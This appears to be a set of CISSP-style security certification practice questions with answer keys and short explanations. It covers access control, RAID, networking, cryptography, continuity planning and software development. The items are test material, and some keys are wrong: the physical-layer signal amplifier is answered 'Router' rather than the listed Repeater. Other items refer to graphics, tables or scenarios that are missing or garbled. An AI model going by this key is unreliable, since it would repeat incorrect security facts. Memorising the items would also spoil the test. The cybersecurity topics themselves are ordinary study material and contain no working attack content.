B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.

A Class C handheld fire extinguisher would be preferable to a Class A handheld fire extinguisher when the fire: A. has just started B. Involves electrical equipment. C. is located in an enclosed area D. Is caused by flammable liquids.

B. Involves electrical equipment.

If an access control has a fail-safe characteristic but not a fail-secure characteristic, what does that mean? A. It defaults to no access. B. It defaults to being unlocked. C. It defaults to being locked. D. It defaults to sounding a remote alarm instead of a local alarm.

B. It defaults to being unlocked.

How is virtual storage created? A. it is a combination of primary and secondary storage. B. It is a combination of RAM and secondary storage C. It is a combination of real storage and secondary storage. D. It is a combination of RAM and EPROM memory.

B. It is a combination of RAM and secondary storage

In order to be admissible in court, evidence should normally be which of the following? A. Subpoenaed B. Relevant C. Motioned D. Adjudicated

B. It is important that evidence be relevant, complete, sufficient, and reliable to the case at hand. These four characteristics of evidence provide a foundation for a case and help ensure that the evidence is legally permissible.

Your office is implementing an access control policy based on decentralized administration, which is controlled directly by the owners and creators of files. What is the major advantage and disadvantage of such an approach? A. it puts access control into the hands of those most accountable for the information, but requires security labels for enforcement. B. It puts access control into the hands of those most accountable for the information, but leads to inconsistencies in procedures and criteria. C. it puts access control into the hands of IT administrators, but leads to procedures and criteria that are too rigid and inflexible. D. It puts access control into the hands of IT administrators, but forces them to overly rely upon file owners to implement the access controls IT puts in place.

B. It puts access control into the hands of those most accountable for the information, but leads to inconsistencies in procedures and criteria.

Which of the following needs to be met so that evidence is legally admissible in court? A. Modified computer files B. Lawful search and seizure C. Force confession D. Entrapment evidence

B. Lawful search and seizure

Hiring new employees requires strict security controls that must be constantly reviewed and audited. Which of the following controls would not be associated with personnel hiring? A. Background checks. B. Least Privilege C. Drug screen. D. NDA

B. Least Privilege

What feature enables code to be executed without the usual security checks? A. Temporal isolation B. Maintenance hook C. Race conditions D. Process multiplexing

B. Maintenance hook

Failure of a contingency plan is usually due to: A. Technical issues. B. Management issues. C. Lack of awareness D. lack of training.

B. Management issues.

Which of the following statements is true regarding a BCP project plan? A. management must have a representative on the BCP team B. Management must approve the plan in writing. C. To ensure diversity, the people who should write the plan, should not be those who carry it out. D. The plan should be tested before presenting it to management.

B. Management must approve the plan in writing.

Greg is the security facility officer of a financial institution. His boss told him that visitors need a secondary screening before they are allowed into sensitive areas within the building. Greg has also been told by the network administrators that after the new HVAC system was installed throughout the facility, they have been noticed that power voltage to the system in the data center sags. Which of the following is the best control that Greg should ensure is implemented to deal with his boss's concern? A. Access and audit logs. B. Mantrap C. Proximity Readers. D. Smart card readers.

B. Mantrap

Mary is creating malicious code that will steal a user's cookies by modifying the original client-side Java script. What type of cross-site scripting vulnerability is she exploiting? A. Second order B. DOM-based C. Persistent D. Nonpersistent

B. Mary is exploiting a document object model (DOM)-based cross-site scripting (XSS) vulnerability, which is also referred to as local cross-site scripting. DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim's browser to execute the resulting abusive JavaScript code. The most effective way to prevent these attacks is to disable scripting support in the browser.

operating systems have evolved and changed over the years. The earlier operating systems were monolithic and did not segregate critical processes from noncritical processes. As time went on, operating system vendors started to reduce the amount of programming code that ran in kernel mode. Only the absolutely necessary code ran in Kernel mode, and the remaining operating system code ran in user mode. This architecture introduced performance issues, which required the operating system vendors to reduce the critical operating system functionality to microkernels and allow the remaining operating system functionality to run in a client/server models within kernel mode. Which of the following best describes the second operating system architecture described in the scenario? A. layered. B. microkernel C. monolithic. D. Kernel-Based.

B. Microkernel

Which is not a drawback to installing intrusion detection and monitoring systems? A. It's expensive to install. B. It cannot be penetrated. C. It requires human response. D. It's subject to false alarms.

B. Monitoring and intrusion detection systems are expensive, require someone to respond when they set off an alarm, and, because of their level of sensitivity, can cause several false alarms. Like any other type of technology or device, they have their own vulnerabilities that can be exploited and penetrated.

Part of operational recovery is designing backup facility configurations to work in an acceptable manner so that business can continue. Which of the following is a setup that allows services to be distributed over two or more in-house centers? A. Hot site. B. Multi-Processing center. C. Mobile site. D. Reciprocal Agreements.

B. Multi-Processing center.

Part of operational recovery is designing backup facility configurations to work in an acceptable manner so that business can continue. Which of the following is a setup that allows services to be distributed over tow or more in-house centers? A. Hot site. B. Multi-processing center. C. mobile site. D. Reciprocal agreements.

B. Multi-processing center.

A small-town security office has recently installed a new computer system for their staff of five. The system contains many levels of classified information and is set up to allow each of the employees different access permissions. Which type f system does this scenario describe? A. Dedicated mode system. B. Multilevel security system. C. Hardware segmentation. D. Layering system.

B. Multilevel security system.

Ensuring data consistency is important for all the following reasons, except A. Replicated data sets can become desynchronized. B. Multiple data items are commonly needed to perform a transaction. C. Data may exist in multiple locations within our information systems. D. Multiple users could attempt to modify data simultaneously.

B. Multiple data items are commonly needed to perform a transaction.

OCTAVE, NIST SP 800-30, and AS/NZS ISO 31000 are different approaches to carrying out risk management within companies and organizations. What are the differences between these methods? A. NIST SP 800-30 and OCTAVE are corporate based, while AS/NZS is international. B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based. C. AS/NZS is IT based, and OCTAVE and NIST SP 800-30 are assurance based. D. NIST SP 800-30 and AS/NZS are corporate based, while OCTAVE is international.

B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based.

Which of the following is an advantage of having an audit performed by an external, third party? A. Third-party audits are cheaper to conduct than internal ones, as they tend to be less extensive. B. Third-party audit teams are likely to have a breadth of experience beyond what internal teams may possess, due to having inspected a wider array of systems, controls, and enterprises. C. Third-party audit teams are likely to better understand the systems and controls they are inspecting than the internal teams responsible for architecting, deploying, and maintaining them. D. Due to their experience having audited a broad array of enterprises, a third-party assessor is likely to better and more objectively understand the internal dynamics and politics of the target organization.

B. One of the great strengths of an external auditor is expected to be the experience of assessing a broader array of systems and controls than are deployed and maintained within any single enterprise. This should bring with it a better understanding of the broader context within which these controls operate, as well as some perspective as to issues the target enterprise is not aware of or hasn't fully considered.

Database software should meet the requirements of what is known as the ACID test. Why should database software carry out atomic transactions, which is one requirement of the ACID test, when OLTP is used? A. So that the rules for database integrity can be established B. So that the database performs transactions as a single unit without interruption C. To ensure that rollbacks cannot take place D. To prevent concurrent processes from interacting with each other

B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure no data is corrupted or that only part of a transaction happens. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test: Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. Durability Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back. The term "atomic" means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database.

Who has the primary responsibility of deterring the classification level for information? A. Senior management B. Owner C. User D. Functional manager.

B. Owner

What is the primary purpose of using one-way hashing on user passwords? A. It minimizes the amount of primary and secondary storage needed to store passwords. B. It prevents anyone from reading passwords in plaintext. C. It avoids excessive processing required by an asymmetric algorithm. D. It prevents replay attacks.

B. Passwords are usually run through a one-way hashing algorithm so the actual password is not transmitted across the network or stored on a system in plaintext. This greatly reduces the risk of an attacker being able to obtain the actual password.

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs to determine whether and how an attacker could truly penetrate her company's defenses, which of the following services should she select? A. Vulnerability assessment. B. Penetration test. C. Regulatory audit. D. DSS audit.

B. Penetration test.

The new reinforced lock and cage serve as which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls

B. Physical controls

What is the relationship between policies and standards? A. Policies detail who should do the work, and standards detail why. B. Policies detail what should be done, and the standards detail how.. C. Policies describe the security vision, and standards detail what should be done. D. Policies embody general principles, and standards describe who does the work.

B. Policies detail what should be done, and the standards detail how..

Protection methods can be integrated into software programs. What type of protection method is illustrated in the graphic that follows? A. Polymorphism B. Polyinstantiation C. Cohesiveness D. Object classes

B. Polyinstantiation is the simultaneous existence of multiple information objects, which refer to the same real-world concept but differ by their classification level and/or their contents. The multiple instances are commonly distinguished by their security levels. Polyinstantiation is when more than one copy of an object is made, and the other copy is modified to have different attributes. This can be done for several reasons. A way to use polyinstantiation is for security purposes, to ensure that a lower-level subject could not access an object at a higher level. If a lower-level subject does not have the clearance of Top Secret, then it should not be able to access data at this classification level.

Which of the following can be described as the process of creating two versions of an object so that users at a lower level of security cannot access information at a higher level of sensitivity? A. polymorphism. B. polyinstantiation C. inference. D. aggregation.

B. Polyinstantiation.

Which of the following lists of terms is usually associated with nongovernmental organizations? A. for official use only, secret, and proprietary. B. Private, proprietary, and sensitive C. unclassified, secret, and top secret. D. sensitive but unclassified, proprietary, and trade secret.

B. Private, Proprietary, and sensitive.

Personal Health Information (PHI) would generally be categorized as which of the following? A. Top secret. B. Private. C. Secret D. Public

B. Private.

Sam is a software developer and has recently gone through secure software development courses. When reviewing his programming code, he sees that his software splits authentication and authorization steps. Why would this be a concern? A. A buffer overflow can cause authorization before identification steps. B. Processing sequencing can be manipulated. C. HTTP splitting can take place. D. Browser injection can take place.

B. Processing sequencing can be manipulated.

There are several different important pieces to the Common Criteria. Which of the following best describes the first of the missing components? A. Target of evaluation B. Protection Profile C. Security Target. D. EALs

B. Protection Profile

Which of the following accurately describes Identity as a Service (IDaaS)? A. A form of single sign-on (SSO) that spans multiple entities in an enterprise B. A form of SSO that spans multiple independent enterprises C. A way to provide SSO without multiple forms of authentication D. A way to demonstrate identity without having to sign on

B. Providers of IDaaS allow their clients to have a form of SSO that works across various otherwise independent accounts for independent vendors. A common example is the ability to use a Google account to create a Facebook page.

John is responsible for deciding on the correct RAID level that is implemented to the company's new RAID system. Which of the following would he choose if the number one priority is performance instead of redundancy? A. RAID 1 B. RAID 0 C. RAID 4 D. RAID 5

B. RAID 0

John is responsible for deciding on the correct RAID level that is implemented on the company's new RAID system, which of the following would he choose if the number one priority is performance instead of redundancy? A. Raid 1 B. Raid 0 C. Raid 4 D. Raid 5.

B. Raid 0

Various levels of RAID dictate the type of activity that will take place within the RAID system. Which level is associated with byte-level parity? A. RAID level 0 B. RAID level 3 C. RAID level 5 D. RAID level 10

B. Redundant array of inexpensive disks (RAID) provides fault tolerance for hard drives and can improve system performance. Redundancy and speed are provided by breaking up the data and writing it across several disks so that different disk heads can work simultaneously to retrieve the requested information. Recovery data is also created—this is called parity—so that if one disk fails, the parity data can be used to reconstruct the corrupted or lost information. Different activities that provide fault tolerance or performance improvements occur at different levels of a RAID system. RAID level 3 is a scheme employing byte-level striping and a dedicated parity disk. Data is striped over all but the last drive, with parity data held on only the last drive. If a drive fails, it can be reconstructed from the parity drive. The most common RAID levels used today is level 5.

System ports allow different computers to communicate with each other's services and protocols. The Internet Corporation for Assigned Names and Numbers has assigned registered ports to be ______________ and dynamic ports to be _____________. A. 0-1024, 49152-65535 B. 1024-49151, 49152-65535 C. 1024-49152, 49153-65535 D. 0-1024, 1025-49151

B. Registered ports are 1024-49151, which can be registered with the Internet Corporation for Assigned Names and Numbers (ICANN) for a particular use. Vendors register specific ports to map to their proprietary software. Dynamic ports are 49152-65535 and are available to be used by any application on an "as needed" basis.

Which is the best description of remote journaling? A. Backing up bulk data to an offsite facility B. Backing up transaction logs to an offsite facility C. Capturing and saving transactions to two mirrored servers in-house D. Capturing and saving transactions to different media types

B. Remote journaling is a technology used to transmit data to an offsite facility, but this usually only includes moving the journal or transaction logs to the offsite facility, not the actual files.

What device works at the physical layer to amplify electrical signals between network segments? A. Switch B. Router C. Repeater D. Gateway.

B. Router

What would be a common access control technique used in firewalls and routers for processing packets? A. role-based access control B. Rule-based Access control C. Time-based access control D. Context access control rules

B. Rule-based Access control

Security Assertion Markup Language (SAML) is an XML-based standard for exchanging authentication and authorization data between systems on different security domains. SAML allows for the sharing of authentication information, such as how authentication took place, entity attributes, and what the entity is authorized to access. SAML is most commonly used in web-based environments that require single sign-on (SSO) capability. Which of the following has a correct definition associated with the corresponding SAML component? A. Two SAML assertions are used (authentication, authorization) that indicate that an SAML authority validated a specific subject. B. SAML assertions are most commonly used to allow for identity federation and distributed authorization. C. SAML binding specification describes how to embed SAML messages within the TCP and UDP protocols. D. SAML profiles define how SAML messages, assertions, and protocols are to be implemented in SSL and TLS.

B. SAML provides a model to allow two parties to share authentication information about one entity. The two parties are considered the service provider and the identity provider. The identity provider asserts information about the principal, such as whether or not the subject has been authenticated or has a particular attribute. The service provider uses the information supplied by the identity provider to make access decisions, including but not limited to, whether or not to trust the identity provider's assertion. By trusting the identity provider's information, the service provider can provide services without requiring the principal to authenticate again. This framework allows for federated identification and distributed authentication across domains.

____ is the name of a policy agreement established between the United States Department of Commerce and the European Union (E.U) in November 2000 to regulate the way that U.S. companies export and handle the personal data (such as names and addresses) of European Citizens. A. Trans-border flow B. Safe harbor C. European Union D. organization for Economic Co-operation and Development.

B. Safe harbor

If an external router filters traffic before it enters the network and another screening device monitors traffic before it enters the internal network, what type of architecture is this? A. Screened host. B. Screened subnet. C. Dual-homed firewall D. Dual subnets. v

B. Screened subnet.

Alice wants to send a message to Bob, who is several network hops away from her. What is the best approach to protecting the confidentiality of the message? A. PPTP B. S/MIME C. Link encryption D. SSH

B. Secure Multipurpose Internet Mail Extensions (S/MIME) is a standard for encrypting and digitally signing e-mail and for providing secure data transmissions using public key infrastructure (PKI).

Use the following scenario to answer Questions 13-15. Jack has just been hired as the security officer for a large hospital. The organization develops some of its own proprietary applications. The organization does not have as many layers of controls when it comes to the data processed by these applications, since it is assumed that external entities will not understand the internal logic of the applications. One of the first things that Jack wants to carry out is a risk assessment to determine the organization's current risk profile. He also tells his boss that the hospital should become ISO certified to bolster its customers' and partners' confidence. Which of the following approaches has been implemented in this scenario? A. Defense-in-depth B. Security through obscurity C. Information security management system D. BS 17799

B. Security through obscurity is depending upon complexity or secrecy as a protection method. Some organizations feel that since their proprietary code is not standards based, outsiders will not know how to compromise its components. This is an insecure approach. Defense-in-depth is a better approach with the assumption that anyone can figure out how something works.

What is the difference between security training and a security awareness program? A. Security awareness involves an enterprise program that targets employees with specific duties regarding information security. B. Security training provides specific role-based instruction for employees with information security responsibilities. C. Security awareness provides specific, role-based instruction for employees with information security responsibilities. D. Security training is necessary for all employees regardless of the role they play with respect to information security.

B. Security training provides specific role-based instruction for employees with information security responsibilities.

Which of the following technologies should Lance's team investigate for increased authentication efforts? A. Challenge Handshake Authentication Protocol B. Simple Authentication and Security Layer C. IEEE 802.2AB D. EAP-SSL

B. Simple Authentication and Security Layer is a protocol-independent authentication framework. This means that any protocol that knows how to interact with SASL can use its various authentication mechanisms without having to actually embed the authentication mechanisms within its code.

Which of the following statements is true with respect to the physical security of distribution and storage facilities? A. Smaller intermediate distribution facilities (IDFs) and storage facilities tend not to contain data as critical as the data in main distribution facilities (MDFs) and data centers, so they require less physical protection. B. Although smaller IDFs and storage facilities contain data as critical as the data in MDFs and data centers, they are commonly less well protected physically. C. All distribution and storage facilities are typically afforded the same level of physical protection in practice. D. Distribution and storage facilities don't require the same level of physical access controls as the production data centers.

B. Smaller IDFs and storage facilities contain data as critical as the data in MDFs and data centers but are commonly less well protected physically. For example, an IDF may be not much more than a switch on a shelf in a janitor's closet that is commonly left unlocked. Likewise, storage facilities for archived data are unlikely to have the same physical access controls as a data center

Use the following scenario to answer Questions 24-26. Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package. Which of the following is the best technology for Sandy's team to implement as it pertains to the previous scenario? A. Computer-aided software engineering tools B. Software configuration management C. Software development life-cycle management D. Software engineering best practices

B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

According to the separation of duties principle, which of the following is true? A. programmers should only test their own code. B. Someone other than programmers should test their code. C. The test code should go directly to production. D. Programmers should interact with code in production.

B. Someone other than programmers should test their code.

Use the following scenario to answer Questions 30-32. Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean's team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current "any-any" rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems. Which of the following is most likely taking place to allow spurious packets to gain unauthorized access to critical servers? A. TCP sequence hijacking is taking place. B. Source routing is not restricted. C. Fragment attacks are underway. D. Attacker is tunneling communication through PPP.

B. Source routing means the packet decides how to get to its destination, not the routers in between the source and destination computer. Source routing moves a packet throughout a network on a predetermined path. To make sure none of this misrouting happens, many firewalls are configured to check for source routing information within the packet and deny it if it is present.

Jack needs to assess the performance of a critical web application that his company recently upgraded. Some of the new features are very profitable, but not frequently used. He wants to ensure that the user experience is positive, but doesn't want to wait for the users to report problems. Which of the following techniques should Jack use? A. Real user monitoring B. Synthetic transactions C. Log reviews D. Management review

B. Synthetic transactions are scripted events that mimic the behaviors of real users and allow security professionals to systematically test the performance of critical services. They are the best approach, because they can detect problems before users notice them. Real user monitoring would rely on users encountering the problem, whereupon the system would automatically report it.

What term is used to describe the construction of a transaction used to systemically test the behavior or performance of a critical service which would normally involve human interaction? A. real user monitoring. B. Synthetic transactions. C. Gray box testing. D. Natural transactions.

B. Synthetic transactions.

Which of the following is one of the easiest and best solutions Tanya can consider for proper data protection? A. Implementation of mandatory access control B. Implementation of access control lists C. Implementation of digital signatures D. Implementation of multilevel security

B. Systems that provide mandatory access control (MAC) and multilevel security are very specialized, require extensive administration, are expensive, and reduce user functionality. Implementing these types of systems is not the easiest approach out of the list. Since there is no budget for a PKI, digital signatures cannot be used because they require a PKI. In most environments access control lists (ACLs) are in place and can be modified to provide tighter access control. ACLs are bound to objects and outline what operations specific subjects can carry out on them.

Which of the following is a true statement pertaining to TACACS, XTACACS, and TACACS+? A. TACACS separates authentication and authorization. B. TACACS+ allows for two-factor authentication and dynamic passwords. C. XTACACS combines authentication, authorization, and auditing. D. TACACS+ combines authentication, authorization, and auditing.

B. TACACS+ allows for two-factor authentication and dynamic passwords.

Advanced Encryption Standard is an algorithm used for which of the following? A.Data integrity B.Bulk data encryption C.Key recovery D. Distribution of symmetric keys

B. The Advanced Encryption Standard (AES) is a data encryption standard that was developed to improve upon the previous de facto standard—the Data Encryption Standard (DES). As a symmetric algorithm, AES is used to encrypt bulk data. Symmetric algorithms of any kind are used to encrypt large amounts of data (bulk), while asymmetric algorithms are used to encrypt a small amount of data as in keys and hashing values.

Mark has been asked to interview individuals to fulfill a new position in his company, chief privacy officer (CPO). What is the function of this type of position? A. Ensuring that company financial information is correct and secure B. Ensuring that customer, company, and employee data is protected C. Ensuring that security policies are defined and enforced D. Ensuring that partner information is kept safe

B. The CPO is a newer position, created mainly because of the increasing demands on organizations to protect a long laundry list of different types of data. This role is responsible for ensuring that customer, company, and employee data is secure and kept secret, which keeps the company out of criminal and civil courts and hopefully out of the headlines.

Jenny needs to engage a new software development company to create her company's internal banking software. It will need to be created specifically for her company's environment, so it must be proprietary in nature. Which of the following would be useful for Jenny to use as a gauge to determine how advanced the various software development companies are in their processes? A. Waterfall methodology B. Capability Maturity Model Integration level C. Auditing results D. Key performance metrics

B. The Capability Maturity Model Integration (CMMI) model outlines the necessary characteristics of an organization's security engineering process. It addresses the different phases of a secure software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance, and what should happen in each phase. It can be used to evaluate security engineering practices and identify ways to improve them. It can also be used by customers in the evaluation process of a software vendor. In the best of both worlds, software vendors would use the model to help improve their processes and customers would use the model to assess the vendor's practices.

Which best describes the IP protocol? A. A connectionless protocol that deals with dialog establishment, maintenance, and destruction B. A connectionless protocol that deals with the addressing and routing of packets C. A connection-oriented protocol that deals with the addressing and routing of packets D. A connection-oriented protocol that deals with sequencing, error detection, and flow control

B. The IP protocol is connectionless and works at the network layer. It adds source and destination addresses to a packet as it goes through its data encapsulation process. IP can also make routing decisions based on the destination address.

Which of the following best describes the difference between the role of the ISO/IEC 27000 series and COBIT? A. COBIT provides a high-level overview of security program requirements, while the ISO/IEC 27000 series provides the objectives of the individual security controls. B. The ISO/IEC 27000 series provides a high-level overview of security program requirements, while COBIT provides the objectives of the individual security controls. C. COBIT is process oriented, and the ISO/IEC 27000 series is solution oriented. D. The ISO/IEC 27000 series is process oriented, and COBIT is solution oriented.

B. The ISO/IEC 27000 series provides a high-level overview of security program requirements, while COBIT provides the objectives of the individual security controls. COBIT provides the objectives that the real-world implementations (controls) you chose to put into place need to meet.

The Mobile IP protocol allows location-independent routing of IP datagrams on the Internet. Each mobile node is identified by its ___________, disregarding its current location in the Internet. While away from its home network, a mobile node is associated with a ____________. A. prime address, care-of address B. home address, care-of address C. home address, secondary address D. prime address, secondary address

B. The Mobile IP protocol allows location-independent routing of IP packets on web-based environments. Each mobile device is identified by its home address. While away from its home network, a mobile node is associated with a care-of address, which identifies its current location, and its home address is associated with the local endpoint of a tunnel to its home agent. Mobile IP specifies how a mobile device registers with its home agent and how the home agent routes packets to the mobile device.

Which of the following is not very useful in assessing the security of acquired software? A. The reliability and maturity of the vendor B. The NIST's National Software Reference Library C. Third-party vulnerability assessments D. In-house code reviews

B. The National Software Reference Library (NSRL) is the only term that was not addressed in this chapter. It comprises a collection of digital signatures of known, traceable software applications intended to assist in the investigation of crimes involving computers. All other three answers are part of a rigorous assessment of the security of acquired software.

Which of the following is based on the fact that it is hard to factor large numbers into two original prime numbers? A. ECC B. RSA C. DES D. Diffie-Hellman

B. The RSA algorithm's security is based on the difficulty of factoring large numbers into their original prime numbers. This is a one-way function. It is easier to calculate the product than it is to identify the prime numbers used to generate that product.

The recovery time objective (RTO) and maximum tolerable downtime (MTD) metrics have similar roles, but their values are very different. Which of the following best describes the difference between RTO and MTD metrics? A. The RTO is a time period that represents the inability to recover, and the MTD represents an allowable amount of downtime. B. The RTO is an allowable amount of downtime, and the MTD represents a time period after which severe and perhaps irreparable damage is likely. C. The RTO is a metric used in disruptions, and the MTD is a metric used in disasters. D. The RTO is a metric pertaining to loss of access to data, and the MTD is a metric pertaining to loss of access to hardware and processing capabilities.

B. The RTO value is smaller than the MTD value, because the MTD value represents the time after which an inability to recover significant operations will mean severe and perhaps irreparable damage to the organization's reputation or bottom line. The RTO assumes that there is a period of acceptable downtime. This means that a company can be out of production for a certain period of time (RTO) and still get back on its feet. But if the company cannot get production up and running within the MTD window, the company is sinking too fast to properly recover.

What type of security encryption component is missing from the table that follows? 802.1X Dynamic WEP Wi-Fi Protected Access Robust Security Network Access Control 802.1X 802.1X or preshared key 802.1X or preshared key Authentication EAP methods EAP methods or preshared key EAP methods or preshared key Encryption WEP CCMP (AES Counter Mode) Integrity None Michael MIC CCMP (AES CBC-MAC) A. Service Set ID B. Temporal Key Integrity Protocol C. Ad hoc WLAN D. Open system authentication

B. The Temporal Key Integrity Protocol (TKIP) generates random values used in the encryption process, which makes it much harder for an attacker to break. To allow for an even higher level of encryption protection, the standard also includes the new Advanced Encryption Standard (AES) algorithm to be used in new WLAN implementations. TKIP actually works with the Wired Equivalent Privacy (WEP) protocol by feeding it keying material, which is data to be used for generating new dynamic keys. WEP uses the RC4 encryption algorithm, and the current implementation of the algorithm provides very little protection. More complexity is added to the key generation process with the use of TKIP, which makes it much more difficult for attackers to uncover the encryption keys. The IEEE working group developed TKIP so that customers would only need to obtain firmware or software updates instead of purchasing new equipment for this type of protection.

Which of the following statements is NOT true about the IPv4 address 192.168.10.129\25? A. It is an RFC 1918-specified private address. B. The netmask for this address is 255.255.255.0. C. The network address for the network it specifies is 192.168.10.128\25. D. The host portion of this 32-bit address is the low-order 7 bits.

B. The \25 classless interdomain routing (CIDR) notation for this address indicates that the high-order (leftmost) 25 bits comprise the network portion, and the remaining low-order (rightmost) 7 bits are the host portion. In binary, the netmask representation would look like: 11111111 11111111 11111111 10000000. The "dotted quad" decimal notation of this netmask would then be 255.255.255.128.

Which of the following is the best and most cost-effective countermeasure for Grace's team to put into place? A. Network address translation B. Disallowing unnecessary ICMP traffic coming from untrusted networks C. Application-based proxy firewall D. Screened subnet using two firewalls from two different vendors

B. The attack description is a smurf attack. In this situation the attacker sends an ICMP Echo Request packet with a spoofed source address to a victim's network broadcast address. This means that each system on the victim's subnet receives an ICMP Echo Request packet. Each system then replies to that request with an ICMP Echo Response packet to the spoof address provided in the packets—which is the victim's address. All of these response packets go to the victim system and overwhelm it because it is being bombarded with packets it does not necessarily know how to process. Filtering out unnecessary ICMP traffic is the cheapest solution.

Which of the following would not be an issue that Jim would have to consider in transitioning administrative services to the cloud? A. Privacy and data breach laws in the country where the cloud servers are located B. Loss of efficiencies, performance, reliability, scalability, and security C. Security provisions in the terms of service D. Total cost of ownership compared to the current systems

B. The biggest advantages of cloud computing are enhanced efficiency, performance, reliability, scalability, and security. Still, cloud computing is not a panacea. We must still carefully consider legal, contractual, and cost issues since they could potentially place an organization in a difficult position.

One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic? A. The building blocks of software are autonomous objects, cooperating through the exchange of messages. B. The internal components of an object can be redefined without changing other parts of the system. C. Classes are reused by other programs, though they may be refined through inheritance. D. Object-oriented analysis, design, and modeling map to business needs and solutions.

B. The characteristics and their associated definitions are listed as follows: Modularity Autonomous objects, cooperation through exchanges of messages. Deferred commitment The internal components of an object can be redefined without changing other parts of the system. Reusability Refining classes through inheritance. Other programs using the same objects. Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.

Not every data transmission incorporates the session layer. Which of the following best describes the functionality of the session layer? A. End-to-end data transmission B. Application client/server communication mechanism in a distributed environment C. Application-to-computer physical communication D. Provides application with the proper syntax for transmission

B. The communication between two pieces of the same software product that reside on different computers needs to be controlled, which is why session layer protocols even exist. Session layer protocols take on the functionality of middleware, enabling software on two different computers to communicate.

Which of the following is not a form of social engineering? A. Pretexting B. Fishing C. Whaling D. Blackmailing

B. The correct term for social engineering conducted over digital communications means is phishing, not fishing.

Companies should follow certain steps in selecting and implementing a new computer product. Which of the following sequences is ordered correctly? A. Evaluation, accreditation, certification B. Evaluation, certification, accreditation C. Certification, evaluation, accreditation D. Certification, accreditation, evaluation

B. The first step is evaluation. Evaluation involves reviewing the product's protection functionality and assurance ratings. The next phase is certification. Certification involves testing the newly purchased product within the company's environment. The final stage is accreditation, which is management's formal approval.

The software development life cycle has several phases. Which of the following lists these phases in the correct order? A. Requirements gathering, design, development, maintenance, testing, release B. Requirements gathering, design, development, testing, operations and maintenance C. Prototyping, build and fix, increment, test, maintenance D. Prototyping, testing, requirements gathering, integration, testing

B. The following outlines the common phases of the software development life cycle: i.Requirements gathering ii.Design iii.Development iv.Testing v. Operations and maintenance

Which of the following is not one of the stages of the DHCP lease process? i.Discover ii.Offer iii.Request iv.Acknowledgment A. All of them B. None of them C. i, ii D. ii, iii

B. The four-step DHCP lease process is DHCPDISCOVER message: This message is used to request an IP address lease from a DHCP server. DHCPOFFER message: This message is a response to a DHCPDISCOVER message, and is sent by one or numerous DHCP servers. DHCPREQUEST message: The client sends this message to the initial DHCP server that responded to its request. DHCPACK message: This message is sent by the DHCP server to the DHCP client and is the process whereby the DHCP server assigns the IP address lease to the DHCP client.

Which of the following types of tests involves discursive explorations of existing response procedures, based on a likely adverse scenario, designed to determine if desired outcomes will result? A. Structured walk-through test B. Tabletop exercise C. Simulation test D. Checklist test

B. The goal of tabletop exercises (TTXs) is to examine existing controls and response procedures to the manifestation of a likely threat, to ensure that everyone who would be involved knows their role and that the resulting outcome across multiple contingencies would be what is desired. Branches in activities are typically explored to some degree, based on cascading dependencies, as well as sequels to the scenario under discussion.

Why is it important to understand the life cycle of cryptography and your cryptographic needs? A. Major new forms of cryptography are constantly being invented, which may replace your use of hashing, symmetric, or asymmetric encryption methods. B. The available key space for any given algorithm (or your choice of keys within it) will inevitably "go stale" over time. C. Symmetric systems like AES are continuously being upgraded to include more rounds of transforms, so it is important to be using the latest version. D. Revolutionary advances in blockchains will replace old cryptography techniques.

B. The historically consistent rate of advance in commercial, off-the-shelf computational power has meant that the work factor of all of our cryptographic key spaces has declined over time. This should be assumed to continue: systems that cannot be easily brute forced today may be easily brute forced tomorrow.

An organization's information system risk management (ISRM) policy should address many items to provide clear direction and structure. Which of the following is not a core item that should be covered in this type of policy? i. The objectives of the IRM team ii. The level of risk the organization will accept and what is considered an acceptable level of risk iii. Formal processes of risk identification iv.The connection between the IRM policy and the organization's strategic planning processes v.Responsibilities that fall under IRM and the roles to fulfill them vi.The mapping of risk to specific physical controls vii. The approach toward changing staff behaviors and resource viii.allocation in response to risk analysis ix. The mapping of risks to performance targets and budgets x. Key indicators to monitor the effectiveness of controls A. ii, v, ix B. vi C. v D. vii, ix

